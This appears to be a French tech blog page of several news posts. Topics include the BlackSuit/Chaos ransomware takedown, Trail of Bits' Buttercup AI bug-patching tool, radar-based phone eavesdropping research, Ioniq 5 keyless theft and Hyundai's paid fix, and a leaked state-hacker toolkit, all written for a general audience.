La créativité de la communauté surprend même les créateurs. Des vétérinaires l’utilisent pour cloner les puces d’animaux perdus, des escape games l’intègrent dans leurs énigmes, des artistes créent des installations interactives, des professeurs l’utilisent pour des démonstrations de physique. Chaque jour, de nouveaux usages émergent et c’est la beauté d’un outil vraiment ouvert.

Et leurs plans pour 2025 sont ambitieux avec de nouveaux modules hardware (ça parle d’un module SDR complet), de l’intégration IA pour l’analyse de protocoles, un marketplace officiel pour les apps, des programmes éducatifs et une expansion internationale. Mais Pavel insiste “L’important n’est pas ce que nous planifions, mais ce que la communauté créera.”

Pavel et Alex pensent en décennies, pas en trimestres comme les commerciaux car le Flipper Zero doit durer 10 ans minimum (construit pour durer), l’écosystème doit survivre aux fondateurs (immortalité du projet), la communauté doit s’auto-organiser (décentralisation), et le projet doit rester pertinent technologiquement (innovation continue). Une vision long terme guide chaque décision… et surtout, pas de quick wins au détriment de la durabilité.

Et ce succès a un prix que peu comprennent car Pavel et Alex ont sacrifié leur anonymat (menaces régulières de tous les camps), leur stabilité (déménagements forcés, merci la guerre), leur vie privée (les médias sur le dos), et leur tranquillité (controverses permanentes sur Twitter), mais ils ne regrettent rien. “C’est le prix de changer le monde”, dit Pavel.

Pavel avoue parfois douter : “Sommes-nous légitimes ? Méritons-nous ce succès ?” Le syndrome de l’imposteur frappe même après 80 millions de revenus mais Alex est plus pragmatique : “On a créé quelque chose dont les gens ont besoin. Le marché a validé. Point.” Cette tension entre doute et confiance nourrit l’humilité de l’équipe et il n’y a pas de grosse tête chez Flipper Devices.

Aujourd’hui, Pavel Zhovner continue de coder depuis Londres et Alex Kulagin négocie avec les usines. Le Flipper Zero n’est pas qu’un gadget. C’est un acte de résistance et un vent de liberté dans un monde où la tech devient de plus en plus fermée.

Faudra faire avec !

Sources : LinkedIn - Pavel Zhovner, Hackaday - Why I started Flipper, GitHub - Zaborona.help, Kickstarter - Flipper Zero Campaign, Flipper Blog - Manufacturing Updates, GitHub - Flipper Zero Firmware, Moscow Neuron Hackspace Study, The Birth of Russia’s Hackerspace Movement, Gizmodo - Flipper Zero Interview, Flipper Zero Firmware 1.0, TechCrunch - M Sales, Hackaday - Canada Ban, BleepingComputer - Amazon Ban, Flipper Zero Official, Awesome Flipper Zero

Cet article fait partie de ma série de l’été spécial hackers. Bonne lecture !

Vous savez ce qui me fascine avec les gangs de ransomware ? C’est leur capacité à renaître de leurs cendres comme des phœnix. L’opération Checkmate vient de frapper BlackSuit le 24 juillet dernier, saisissant 4 serveurs, 9 domaines .onion et récupérant 1,09 million de dollars en crypto, mais instantanément, les cybercriminels ont déjà muté en “Chaos”, leur nouvelle identité lancée en février dernier. Trop fort ! Ils avaient anticipé le coup !

Pour comprendre l’ampleur de ce bordel, il faut remonter à mai 2022. À cette époque, le gang Conti, ces tarés qui avaient attaqué le Costa Rica et déclaré leur soutien à la Russie dans la guerre en Ukraine, implose complètement. Un insider balance 60 GB de leurs conversations internes sur Twitter. On y découvre alors tout : leurs méthodes, leurs cibles, leurs comptes Bitcoin, même leurs conversations WhatsApp où ils parlent de leurs gosses et de leurs vacances. Du jamais vu !

Mais ces mecs sont malins et plutôt que de disparaître, ils se fragmentent en plusieurs groupes. D’abord Quantum en janvier 2022, qui teste les eaux avec le ransomware ALPHV/BlackCat. Puis Royal en septembre 2022, qui développe son propre encrypteur Zeon. Et enfin BlackSuit en juin 2023, juste après avoir mis la ville de Dallas à genoux. À chaque mutation, ils perfectionnent leurs techniques et augmentent leurs tarifs. C’est l’évolution darwinienne version cybercrime !

L’attaque de Dallas en mai 2023, c’est leur chef-d’œuvre. Ils paralysent complètement la ville : services d’urgence 911 hors service, tribunaux fermés, administration municipale KO. Les flics doivent revenir aux rapports papier, les ambulances naviguent avec des cartes routières, c’est le chaos total. Royal demande 60 millions de dollars de rançon ! La ville refuse de payer mais les dégâts sont estimés à plus de 8,5 millions. C’est là qu’ils décident alors de se “rebrander” en BlackSuit… Trop de chaleur médiatique, j’imagine…

Et surtout mes amis, l’ampleur des dégâts est incroyable. Depuis 2022, BlackSuit et Royal ont touché plus de 450 organisations américaines, extorquant 370 millions de dollars selon les estimations du FBI. Mais attention, c’est juste ce qu’on sait ! Les vraies victimes sont probablement le double car beaucoup préfèrent payer en silence plutôt que de voir leurs données exposées. Hôpitaux, écoles, services d’urgence, centrales électriques… ces enfoirés ciblent spécifiquement les infrastructures critiques car elles sont plus susceptibles de payer rapidement.

La collaboration internationale pour l’Opération Checkmate, c’est du jamais vu dans l’histoire de la cybercriminalité. 8 pays unis sous la coordination d’Europol : Canada (RCMP), Royaume-Uni (NCA), Allemagne (BKA et le parquet de Francfort), Ukraine (Cyber Police), Lituanie, France (ANSSI), Irlande et les États-Unis évidemment avec ICE, FBI, Secret Service et l’OFAC.

Chacun apporte ses compétences spécifiques. Les Allemands du BKA avec leur expertise technique légendaire sur l’analyse forensique. Les Ukrainiens avec leur unité cybercrime qui est devenue ultra performante depuis qu’ils se font attaquer H24 par les Russes. Les Britanniques du NCA avec leur expérience des réseaux criminels et leurs infiltrations. Les Néerlandais qui ont fourni l’infrastructure pour coordonner l’opération. Même BitDefender, la boîte roumaine de cybersécurité, était dans le coup !

Cisco Talos a alors rapidement identifié que Chaos présente des similitudes troublantes avec BlackSuit. Mêmes commandes de chiffrement, mêmes structures de notes de rançon, mêmes outils living-off-the-land (ces techniques qui utilisent les outils légitimes Windows pour passer sous les radars). C’est comme si les développeurs avaient juste fait un Ctrl+H pour remplacer “BlackSuit” par “Chaos” dans leur code.

BlackSuit lui-même était né des cendres de Conti. C’est une dynastie criminelle qui remonte à 2016 avec Ryuk, puis Conti en 2020, puis la fragmentation en 2022. À chaque fois qu’on les tape, ils reviennent plus forts. C’est l’Hydre de Lerne version 2.0… tu coupes une tête, il en repousse deux !

Ce nouveau groupe “Chaos” opère donc déjà sur le forum criminel russe RAMP (Ransom Anon Market Place). Pour ceux qui connaissent pas, RAMP c’est le LinkedIn des cybercriminels. Créé en juillet 2021 par TetyaSluha (qui s’est rebrandé en “Orange”), c’est LE forum où les gangs de ransomware recrutent leurs affiliés après que les autres forums comme XSS et Exploit les aient bannis suite à l’attaque de Colonial Pipeline.

RAMP, c’est 14 000 membres qui parlent russe, chinois et anglais et pour s’inscrire, faut soit être recommandé par un membre d’XSS ou Exploit avec plus de 2 mois d’ancienneté et 10 messages, soit casquer 500 dollars cash. Ils ont même un système d’escrow façon Silk Road pour garantir les transactions. C’est Amazon pour les criminels, avec des notes et des avis clients !

Chaos propose donc leur ransomware-as-a-service (RaaS) compatible Windows, ESXi, Linux, BSD et NAS. Leur première demande connue s’élève à 300 000 dollars, mais c’est juste le prix d’entrée. Pour les grosses entreprises, ça peut monter jusqu’à 60 millions !

Leurs techniques d’infiltration sont diaboliques puisqu’ils combinent :

• Spam flooding : bombardement d’emails de phishing jusqu’à ce qu’un employé craque
• Ingénierie sociale par téléphone : ils appellent le support IT en se faisant passer pour des employés
• Living-off-the-land : utilisation de PowerShell, WMI, et autres outils Windows légitimes
• Supply chain attacks : compromission de fournisseurs pour atteindre les vraies cibles
• Zero-days achetés sur Genesis Market : des vulnérabilités inconnues à 100 000 dollars pièce

Leur spécialité ce sont les environnements VMware ESXi. Ces salopards ont compris que si tu chiffres l’hyperviseur, tu paralyses TOUTES les machines virtuelles d’un coup. Plus besoin donc de chiffrer 500 serveurs individuellement. Il suffit d’attaquer l’ESXi et boom, c’est game over. Ils exploitent notamment la CVE-2024-37085 où il suffit de créer un groupe “ESX Admins” dans l’Active Directory pour avoir les droits admin complets. Du grand art !

Les techniques d’attaque de Chaos sont d’un autre niveau :

• Clés de chiffrement individuelles pour chaque fichier (impossible de créer un décrypteur universel)
• Chiffrement optimisé : seulement les premiers 1MB de chaque fichier pour aller plus vite
• Ciblage des sauvegardes : suppression des snapshots VMware, Volume Shadow Copies, backups Veeam
• Double extorsion : vol des données avant chiffrement pour faire pression
• Triple extorsion : DDoS sur le site de la victime si elle refuse de payer

Mais le plus dingue, c’est leur nouveau système de négociation. Ils utilisent pour cela des chatbots IA pour gérer les discussions avec les victimes ! Plus besoin d’avoir un négociateur humain disponible 24/7. L’IA analyse le profil de la victime, adapte le ton, applique des techniques de pression psychologique, et peut même négocier dans plusieurs langues simultanément. C’est ChatGPT au service du crime organisé !

Le chatbot est programmé pour :

• Offrir une “preuve de vie” en déchiffrant gratuitement 2 fichiers
• Augmenter la pression toutes les 24h avec menaces de publication
• Proposer des “réductions” si paiement rapide (technique de vente classique)
• Menacer de contacter les clients/partenaires de la victime
• Publier automatiquement 10% des données volées si pas de réponse après 72h

Heureusement, l’Opération Checkmate a porté un coup sévère. Les autorités ont saisi les serveurs hébergeant les sites .onion de négociation et de leak. Les domaines miroirs ont aussi été pris simultanément pour éviter toute migration rapide. Les systèmes de blanchiment via mixers Bitcoin ont été démantelés. Même les comptes sur les exchanges crypto ont été gelés grâce à l’OFAC.

Mais bon, le plus inquiétant dans cette affaire, c’est surtout la rapidité de la mutation. BlackSuit était actif jusqu’au 24 juillet, jour de la saisie. Mais Chaos était déjà opérationnel depuis février ! Ces enfoirés avaient anticipé l’intervention policière et préparé leur sortie de secours 5 mois à l’avance. Plusieurs affiliés de BlackSuit avaient d’ailleurs déjà migré vers la nouvelle plateforme, emportant avec eux leurs accès aux réseaux compromis.

L’impact sur les victimes reste dramatique. Les secteurs de la santé et de l’éducation, déjà fragilisés par le COVID et les coupes budgétaires, subissent des pertes moyennes de 800 000 dollars par incident selon les dernières statistiques. Mais c’est rien comparé aux coûts cachés :

• Arrêt d’activité : 21 jours en moyenne pour un retour à la normale
• Perte de confiance des clients : -23% de chiffre d’affaires sur 2 ans
• Frais légaux et de notification : 450 000 dollars minimum
• Augmentation des primes d’assurance cyber : x3 après une attaque
• Coût de reconstruction from scratch : souvent plus cher que la rançon

Les petites municipalités américaines, avec leurs budgets IT dérisoires (genre 50 000 dollars par an pour protéger toute une ville), deviennent des cibles privilégiées. Lake City en Floride a payé 460 000 dollars. Riviera Beach a lâché 600 000. LaPorte County dans l’Indiana, 130 000. C’est open bar pour les criminels !

SC Media souligne à juste titre que malgré cette victoire, le problème reste entier. Tant que le modèle économique du RaaS reste rentable (les affiliés touchent 70 à 90% des rançons !), de nouveaux groupes continueront d’émerger. La décentralisation via les cryptomonnaies et les forums du dark web rend ces organisations presque impossibles à éradiquer complètement.

Le pire c’est que les gouvernements eux-mêmes alimentent le problème. La NSA développe des exploits qui finissent sur le marché noir (coucou EternalBlue et WannaCry). Les services de renseignement achètent des zero-days au lieu de les signaler. Et certains pays (on ne citera pas la Russie et la Corée du Nord) protègent activement ces groupes tant qu’ils ne ciblent pas leurs citoyens.

Bref, cette lutte contre les ransomwares ressemble à un jeu du chat et de la souris infini car même si les forces de l’ordre marquent des points importants comme avec Checkmate, les criminels s’adaptent et reviennent sous de nouvelles formes. C’est la version cyber de la guerre contre la drogue… on arrête un cartel, trois autres prennent sa place.

Du coup, au risque de rabâcher, n’oubliez pas que la seule vraie défense reste la prévention :

• Sauvegardes hors ligne : la règle 3-2-1 (3 copies, 2 supports différents, 1 hors site)
• Patchs à jour : 85% des attaques exploitent des vulns connues depuis plus de 2 ans
• Formation du personnel : 91% des attaques commencent par un email de phishing
• Segmentation réseau : limiter la propagation latérale
• Plans de réponse aux incidents : testés régulièrement avec des simulations
• Cyber-assurance : mais lisez les petites lignes car certaines excluent les “actes de guerre cyber”

Parce qu’au final, ce n’est pas une question de SI vous serez ciblé, mais de QUAND. Les stats sont implacables puisque 71% des organisations ont subi au moins une attaque ransomware en 2024. Et pour les 29% restants… soit ils mentent, soit ils ne le savent pas encore !

On vit vraiment une époque formidable où des criminels peuvent paralyser un hosto depuis leur canapé à Moscou tout en négociant une rançon à l’aide d’un chatbot IA. À vous de voir maintenant si vous préférez investir dans la prévention ou financer involontairement le prochain yacht d’un cybercriminel russe…

Sources : ICE - Operation Checkmate Takedown, BleepingComputer - Royal and BlackSuit Impact, Cisco Talos - Chaos Ransomware Analysis, SOCRadar - RAMP Forum Analysis, SC Media - Operation Checkmate, TechCrunch - CISA/FBI Advisory

Ce serait quoi un monde où les bugs de sécurité se font corriger avant même que les hackers ne les trouvent ? Ce serait plus calme non ? J’écrirais moins sur les failles de sécurité cela dit, mais ça me ferais plus de temps pour chiller dans le hamac. Breeeef, ça va peut-être se produire bientôt car c’est exactement ce que vient de rendre possible Trail of Bits en libérant Buttercup, leur système AI qui a décroché la deuxième place et 3 millions de dollars au challenge AIxCC du DARPA.

Et c’est maintenant open source et ça tourne sur votre laptop.

La tendance actuelle c’est une explosion des vulnérabilités… y’a plus de code produit que jamais, des dépendances partout, et des hackers de plus en plus organisés. Donc les équipes de sécurité sont débordées et passent leur temps à courir après les failles. Heureusement, Buttercup vient inverser complètement la donne en automatisant tout le processus, de la détection au patch.

Ce qui rend ce système spécial, c’est qu’il combine le meilleur des deux mondes. D’un côté, les techniques classiques de cybersécurité comme le fuzzing (bombarder le code avec des entrées aléatoires pour le faire planter) et l’analyse statique. Et de l’autre, sept agents IA différents qui collaborent pour comprendre le contexte, générer des patchs et vérifier qu’ils ne cassent rien d’autre.

Lorsqu’on lui confie une analyse, d’abord, Buttercup lance donc une campagne de fuzzing augmentée par IA sur votre code. Et au lieu de tester bêtement des entrées aléatoires, l’IA apprend quels patterns ont le plus de chances de révéler des bugs. Puis, quand une vulnérabilité est trouvée, le système utilise des outils comme tree-sitter et CodeQuery pour créer un modèle complet du programme et comprendre exactement comment le bug s’intègre dans l’architecture globale.

Et c’est là que ça devient vraiment intéressant car les sept agents IA entrent alors en action, avec chacun avec sa spécialité. L’un analyse le bug, l’autre génère des propositions de patch, un troisième vérifie que le patch ne casse pas les tests existants, et ainsi de suite. Ils se coordonnent tous pour produire un patch normalement robuste qui corrige vraiment le problème sans créer de régression.

Pendant la compétition DARPA à DEF CON 33, Buttercup a impressionné tout le monde. Le système a trouvé et patché des vulnérabilités dans 20 des 25 CWEs les plus dangereux selon MITRE. Et je vous parle de trucs sérieux : buffer overflows, injections SQL, race conditions… Trail of Bits a même reçu le prix “LOC Ness Monster” pour avoir soumis un patch de plus de 300 lignes qui fonctionnait parfaitement.

Ce qui est fou, c’est qu’ils ont obtenu ces résultats en utilisant uniquement des modèles IA moins chers, non-reasoning, et pas les gros modèles de raisonnement ultra-chers. Ça veut dire que c’est accessible pour des projets normaux, pas seulement pour les géants de la tech avec des budgets illimités.

L’installation est vraiment simple pour un outil de cette complexité :

git clone --recurse-submodules https://github.com/trailofbits/buttercup.git
cd buttercup
make setup-local
make deploy-local

Bon, il vous faudra quand même 8 cœurs CPU, 16GB de RAM et environ 100GB d’espace disque. Plus des clés API pour OpenAI ou Anthropic si vous voulez utiliser les fonctionnalités IA. Mais comparé à d’autres outils de sécurité enterprise, c’est vraiment raisonnable. Rassurez-vous aussi, il est possible de fixer un budget maximum en conso API.

Le système supporte actuellement le C et le Java, avec une compatibilité OSS-Fuzz pour s’intégrer facilement dans vos pipelines existants. Il y a même une interface web pour monitorer les tâches en cours et voir exactement ce que fait le système.

Ce qui me plaît vraiment dans ce projet, c’est surtout la philosophie derrière car au lieu de garder cette technologie secrète ou de la vendre hyper cher, Trail of Bits a décidé de tout libérer. Ils ont même créé une version “laptop-friendly” spécialement optimisée pour tourner sur des machines normales, pas juste des clusters de serveurs.

Dans le contexte actuel, c’est une vraie révolution. Google a par exemple montré que son IA peut trouver de nouvelles vulnérabilités dans des projets open source majeurs et Meta développe AutoPatchBench pour standardiser la réparation automatique. Mais Buttercup est le premier système complet, de bout en bout, et open source.

Avec cet outil, des projets open source pourrait se patcher automatiquement et les développeurs pourraient alors se concentrer sur les features au lieu de passer des heures à debugger. Bien sûr, ce n’est pas magique et Buttercup ne remplacera pas les experts en sécurité mais c’est un outil incroyablement puissant qui peut automatiser la partie la plus répétitive et chronophage du travail. Et vu que c’est open source, la communauté peut l’améliorer, l’adapter à ses besoins, créer des plugins…

Donc, si vous bossez dans le dev ou la sécurité, allez jeter un œil au GitHub de Buttercup et qui sait, peut-être qu’un jour on regardera en arrière et on se demandera comment on faisait sans IA pour sécuriser notre code.

Vous pensiez sérieusement que vos conversations téléphoniques étaient privées tant qu’on n’était pas sur écoute. Et bien, j’ai pas une très bonne nouvelle pour vous… Voilà que des chercheurs de Penn State ont prouvé qu’un simple radar pouvait transformer les vibrations microscopiques de votre téléphone en transcription de vos appels. Y’a pas besoin de pirater quoi que ce soit, juste de pointer un capteur dans votre direction.

Le principe c’est que quand vous téléphonez, l’écouteur de votre smartphone produit des vibrations de seulement 7 micromètres. C’est tellement infime qu’on ne peut même pas le percevoir en tenant le téléphone. Pourtant, ces vibrations se propagent dans tout le châssis de l’appareil et créent ainsi une signature unique pour chaque son émis. Selon l’équipe de recherche, leur système mmWave-Whisper utilise un radar fonctionnant entre 77 et 81 GHz capable de capter ces mouvements invisibles et de les convertir en audio exploitable.

Le systeme mmWave-Whisper

Et ils ont réussi à obtenir une très bonne précision de transcription de 44,74% sur les mots et de 62,52% sur les caractères individuels. Ça peut sembler faible, mais même avec seulement la moitié des mots corrects, on peut facilement reconstituer le sens d’une conversation grâce au contexte. C’est comme lire un message avec des lettres manquantes, votre cerveau va combler automatiquement les trous. Je sais, je sais, y’a des gens qui même qui avec un texte complet ne le comprennent qu’à moitié, mais je vous assure que c’est ce qu’est censé faire le cerveau ^^.

Et cela fonctionne jusqu’à 3 mètres de distance et est totalement insensible au bruit ambiant car contrairement à un micro qui capte tous les sons environnants, le radar ne détecte que les vibrations du téléphone lui-même. Vous pourriez être dans un café bondé, le système s’en fiche complètement…

Suryoday Basak et Mahanth Gowda, les deux chercheurs derrière cette découverte, ont adapté Whisper, le modèle de reconnaissance vocale d’OpenAI, pour qu’il puisse interpréter ces signaux radar. Pour cela, ils ont utilisé une technique appelée “Low-Rank Adaptation” qui leur a permis de spécialiser le modèle avec seulement 1% de ses paramètres modifiés.

Alors adios notre vie privée ?

Et bien la mauvaise nouvelle c’est que ces radars mmWave sont déjà partout. On les trouve dans les voitures autonomes, les détecteurs de mouvement, les casques VR, et même dans certains équipements 5G. Comme le soulignent plusieurs experts, n’importe quel appareil équipé de cette technologie pourrait théoriquement être détourné pour espionner des conversations. Donc, imaginez un parking avec des dizaines de voitures récentes, chacune équipée de plusieurs radars mmWave. Bah voilà, c’est potentiellement un réseau d’écoute géant qui s’ignore.

Cette recherche s’inscrit dans la continuité de leur projet mmSpy de 2022, où ils avaient déjà réussi à identifier des mots isolés avec 83% de précision. Mais cette fois, ils sont passés à un niveau supérieur en déchiffrant des phrases complètes et des conversations entières. D’après les documents techniques, ils ont même généré des données synthétiques pour entraîner leur système, contournant ainsi le manque de datasets radar-audio disponibles.

Pour l’instant, cette technologie a ses limites car les mouvements des personnes créent des interférences (mangez-bougez !!), et la précision diminue rapidement avec la distance, mais combien de temps avant que ces limitations soient surmontées ? Les chercheurs eux-mêmes admettent que leur but est d’alerter sur cette vulnérabilité avant que des acteurs malveillants ne l’exploitent. Selon leur publication, ils comparent cette capacité à lire sur les lèvres qui ne capture environ que 30 à 40% des mots mais permet quand même de suivre une conversation.

Alors, comment s’en protéger ? Et bien pour l’instant, il n’y a pas vraiment de solution miracle. Utiliser des écouteurs pourrait limiter les vibrations du téléphone, mais ce n’est pas une garantie absolue donc la vraie question, c’est de savoir combien de temps il faudra avant que cette technologie soit miniaturisée au point de tenir dans un stylo ou intégrée discrètement dans des objets du quotidien façon 007.

On ne peut plus se contenter de sécuriser nos communications numériques, il faut maintenant s’inquiéter des propriétés physiques de nos appareils. Je vous jure, je suis fatigué :). Les implications pour la sécurité sont énormes car cette technologie est indétectable pour le commun des mortels puisque ça ne laisse aucune trace et ne nécessite aucun accès physique ou numérique au téléphone…

Source

En tant que propriétaire très heureux d’un Ioniq 5, j’ai failli m’étouffer avec ma Danette au chocolat ce soir en découvrant que Hyundai voulait faire payer 65 dollars pour corriger une vulnérabilité de sécurité dans ses voitures. Oui, payer pour ne pas se faire voler sa voiture par des types équipés d’un appareil qui ressemble à une vieille Game Boy de Nintendo. C’est déjà assez rageant de devoir raquer un abonnement pour les mises à jour OTA (Over-The-Air), mais là on atteint des sommets.

Mais d’abord, parlons de ce fameux dispositif “Game Boy”. Techniquement, c’est un émulateur, c’est à dire un ensemble de matériel de transmission radio fourré dans une coque qui ressemble à la console portable iconique de Nintendo. Le prix de ces petits bijoux se situe entre 16 000 et 30 000 dollars sur le marché noir et certains modèles russes se vendent même à 15 000 euros. Pour ce prix-là, vous pourriez presque vous acheter une vraie Ioniq 5 d’occasion.

Le principe du hack c’est que ça exploite une faiblesse fondamentale dans l’architecture de sécurité des véhicules modernes. Quand vous touchez la poignée de votre Ioniq 5, la voiture se réveille et initie un protocole de handshake avec ce qu’elle pense être votre clé. C’est là que la fausse Game Boy entre en jeu. Elle intercepte cette communication et se fait passer pour votre porte-clés légitime.

Mais comment est-ce possible techniquement ? Et bien laissez-moi vous emmener dans les entrailles du système CAN (Controller Area Network) de votre voiture. Selon l’expert en sécurité Ken Tindell, l’attaque CAN injection fonctionne en introduisant de faux messages sur le bus CAN, comme s’ils provenaient du récepteur de clé intelligente de la voiture. Ces messages trompent alors le système de sécurité pour qu’il déverrouille le véhicule et désactive l’immobilisateur moteur.

Sur certaines voitures, les voleurs peuvent accéder au réseau CAN en cassant simplement un phare ou l’aile et en utilisant sa connexion au bus pour envoyer des messages. À partir de là, ils peuvent ensuite manipuler n’importe quel dispositif électronique du véhicule. Les messages CAN n’ont aucune authentification ni sécurité et les récepteurs leur font simplement confiance.

Mais l’émulateur Game Boy va encore plus loin car il n’utilise pas l’injection CAN, non… Ce serait trop facile. A la place, il s’attaque au système de rolling code censé protéger votre clé. Normalement, chaque fois que vous utilisez votre porte-clés, le code change pour éviter les attaques par rejeu, mais ces dispositifs calculent le prochain code valide en quelques secondes. Et voilà comment on déverrouille et démarre un Ioniq 5 en moins de 30 secondes.

Une fois votre voiture volée, les malfaiteurs retirent les modules de connectivité pour rendre le GPS et le tracking via l’application Bluelink inutiles et votre belle Ioniq 5 s’évanouit dans la nature en direction d’un pays chaud.

Face à cette menace, Hyundai a donc imaginé une super solution. Il s’agit d’un patch matériel qui améliore la technologie Ultra-Wideband (UWB) pour une détection plus sécurisée de la clé. L’UWB permet une authentification plus précise entre votre clé/téléphone et le véhicule, rendant beaucoup plus difficile pour les émulateurs de se faire passer pour des clés légitimes. La technologie mesure aussi précisément la distance entre la clé et la voiture, empêchant également les attaques par relais classiques.

Mais voilà le hic… Hyundai présente cette mise à jour comme une “amélioration volontaire” plutôt qu’un rappel obligatoire. Leur justification c’est que le Ioniq 5 a été développée et certifiée selon toutes les normes réglementaires, y compris les exigences de cybersécurité. Et comme cette menace est classifiée comme “évolutive”, Hyundai estime qu’il est juste de demander aux clients une “contribution subventionnée” de 49 livres sterling (65 dollars US) pour le correctif.

Permettez-moi de vous traduire ce charabia corporate : “Notre voiture a une faille de sécurité béante, mais comme elle respectait les normes au moment de sa conception, on va vous faire payer pour la corriger.” C’est très rigolo quand on sait que l’Ioniq 5 est vendue avec une garantie de 5 ans.

Et le problème va bien au-delà de Hyundai car cette vulnérabilité touche aussi les Kia EV6 et Genesis GV60, qui partagent la même plateforme E-GMP. D’autres constructeurs comme Infiniti, Lexus, Mercedes-Benz, Mitsubishi, Nissan, Subaru et Toyota sont également vulnérables à des attaques similaires. C’est donc un problème systémique de l’industrie automobile qui a adopté une approche “coque dure/centre mou” où les composants internes sont considérés comme dignes de confiance.

La vraie solution serait donc d’adopter un framework “zero trust” où chaque composant du bus CAN devrait être ré-authentifié lors de son remplacement. Mais vous vous en doutez, ça coûterait une fortune à implémenter sur les véhicules existants. En attendant, certains propriétaires comme Elliott Ingram poursuivent Hyundai en justice pour ne pas avoir divulgué ces risques et d’autres prédisent que les assurances pourraient à l’avenir refuser de couvrir les véhicules non modifiés.

Pour le moment, ce patch n’est pas dispo en France mais quand ça le sera, je pense que je finirai par payer parce que même si ça me fait mal, entre payer pour un patch de sécurité à 65 balles et me retrouver sans voiture un matin, le choix est vite fait.

Mais cela n’empêche pas que c’est une pratique scandaleuse de la part de Hyundai…

Source

Cet article fait partie de ma série de l’été spécial hackers. Bonne lecture !

Vous savez ce qui est encore plus embarrassant que de se faire pirater quand on est une multinationale ? Se faire pirater quand on est soi-même un pirate travaillant pour un État. Et c’est exactement ce qui vient d’arriver à un mystérieux opérateur APT (Advanced Persistent Threat) dont 9GB de données ont été divulguées par deux hackers se faisant appeler Saber et cyb0rg. L’arroseur arrosé dans toute sa splendeur !

L’histoire commence de manière plutôt originale puisque cette fuite monumentale a été révélée lors du 40e anniversaire du légendaire magazine Phrack, pendant la convention DEF CON 33 à Las Vegas. Pour ceux qui ne connaissent pas, Phrack c’est LA bible des hackers depuis 1985, fondée par Taran King et Knight Lightning. Un zine underground qui a formé des générations entières de hackers avec ses articles techniques pointus et sa philosophie du “Hacker Manifesto”. Ces derniers, après être sortis de 3 années de silence en 2024, ont fêté leurs 40 ans le 8 août dernier avec un cadeau plutôt explosif : L’intégralité du toolkit d’espionnage d’un acteur étatique. Rien que ça !

DEF CON, la convention où l’arroseur s’est fait arroser

Saber et cyb0rg ne sont pas des petits nouveaux. Ils expliquent dans leur article publié dans Phrack #72 avoir compromis à la fois une workstation virtuelle ET un serveur privé virtuel (VPS) utilisés par cet opérateur APT qu’ils ont surnommé “KIM”. Le duo affirme avoir passé des mois à analyser les habitudes de leur cible avant de frapper. Pour cela, ils ont exploité une mauvaise configuration des services cloud de l’opérateur et une réutilisation de mots de passe entre différents systèmes. Basique mais efficace, car oui, même les espions d’État font des erreurs de débutant !

Mais attention, l’identité réelle de notre espion maladroit reste un vrai casse-tête. Si Saber et cyb0rg affirment avoir compromis un ordinateur lié au groupe Kimsuky (ces fameux hackers nord-coréens du Bureau 121 qui font régulièrement parler d’eux depuis 2013), les experts en sécurité émettent des doutes sérieux.

Pour rappel, Kimsuky (aussi connu sous les noms APT43, Emerald Sleet ou THALLIUM) travaille directement pour le Reconnaissance General Bureau (RGB) nord-coréen. En gros, c’est leur CIA à eux. Et les mecs sont plutôt spécialisés dans l’espionnage et le vol d’informations sur les politiques étrangères liées à la péninsule coréenne, le nucléaire et les sanctions internationales à leur encontre. Ils ont notamment ciblé des think tanks sud-coréens, japonais et américains avec des campagnes de spear-phishing ultra sophistiquées. Par exemple, en mai 2024, ils exploitaient encore des failles DMARC pour usurper l’identité d’organisations de confiance.

Sauf que voilà, plusieurs éléments clochent. L’opérateur piraté semble parler chinois mandarin, et pas coréen. Son historique de navigation Chrome et Brave (presque 20 000 entrées !) montre des recherches en caractères simplifiés, pas en hangul (l’alphabet officiel du coréen), ses bookmarks pointent vers des sites chinois, et surtout, ses cibles privilégiées correspondent parfaitement au profil d’un acteur chinois : Taiwan, le Japon et la Corée du Sud. Certains experts pensent même qu’il pourrait délibérément imiter les méthodes de Kimsuky pour brouiller les pistes. C’est une technique connue sous le nom de “false flag operation” dans le monde du renseignement.

Alors Corée du Nord ou Chine ? Le mystère reste entier

Le butin déballé par nos deux Robin des Bois du hacking est absolument dingue. C’est 8,90 GB de données ultra sensibles avec :

• 19 783 entrées d’historique de navigation sur Chrome et Brave, révélant les habitudes et méthodes de travail de l’opérateur
• Des logs d’attaques actives contre le gouvernement sud-coréen, notamment le Defense Counterintelligence Command et le Supreme Prosecutor Office
• Du code source d’outils custom développés spécifiquement pour leurs opérations
• Des identifiants et mots de passe pour différents systèmes compromis
• Des scripts de commande et contrôle (C2) pour gérer les machines infectées
• Des manuels opérationnels détaillant comment utiliser leurs backdoors
• Des logs de campagnes de phishing avec les templates utilisés et les listes de victimes

Y’a même une capture écran de son bureau :

Mais le plus juteux, c’est surtout l’arsenal technique complet de l’opérateur. On y trouve le backdoor kernel TomCat, une saloperie qui s’installe au niveau du noyau système pour une persistance maximale. Des beacons Cobalt Strike customisés, Cobalt Strike étant cet outil commercial à 3 500 dollars la licence, vendu comme “logiciel de simulation d’adversaire” mais adoré par les vrais méchants. Il y a aussi la backdoor Ivanti RootRot qui exploite les vulnérabilités CVE-2025-0282 et CVE-2025-22457 découvertes fin 2024. Sans oublier des variantes modifiées d’Android Toybox pour compromettre les smartphones. Et l’exploit BRUSHFIRE/Bushfire pour les systèmes Ivanti Connect Secure.

Pour comprendre l’ampleur du désastre, c’est comme si un cambrioleur professionnel se faisait voler sa mallette contenant tous ses outils, ses plans de cambriolage, son carnet d’adresses avec les codes d’alarme de ses cibles, et même son journal intime où il note ses techniques. Bah voilà, c’et exactement ça qui vient d’arriver à notre cher APT !

DDoSecrets, les nouveaux WikiLeaks mais en mieux organisé

DDoSecrets a indexé et publié l’archive complète, la rendant accessible gratuitement à tous les chercheurs et journalistes. Pour ceux qui ne connaissent pas, DDoSecrets (Distributed Denial of Secrets) ce sont les nouveaux WikiLeaks, fondé en 2018 par Emma Best et Thomas White après que WikiLeaks soit devenu… compliqué avec l’affaire Assange.

Emma Best, journaliste spécialisée en sécurité nationale et activiste de la transparence non-binaire basée à Boston, avait d’ailleurs clashé avec Assange avant de créer DDoSecrets. Elle l’accusait notamment d’avoir menti sur la source des emails du DNC. Avec moins de 20 personnes et un budget 3000 fois inférieur à WikiLeaks, DDoSecrets a déjà publié plus de 100 millions de fichiers en provenance de 59 pays et leur philosophie est : “La vérité est son propre objectif.” Pas d’ego, pas de drama, juste de la transparence extrêmement radicale.

Leurs analystes confirment donc que les contenus de l’archive semblent authentiques et cohérents avec un véritable toolkit d’espionnage, ce qui est également confirmé par plusieurs experts en threat intelligence. Les victimes sud-coréennes ont également été notifiées avant la publication, histoire de limiter les dégâts. Ouf !

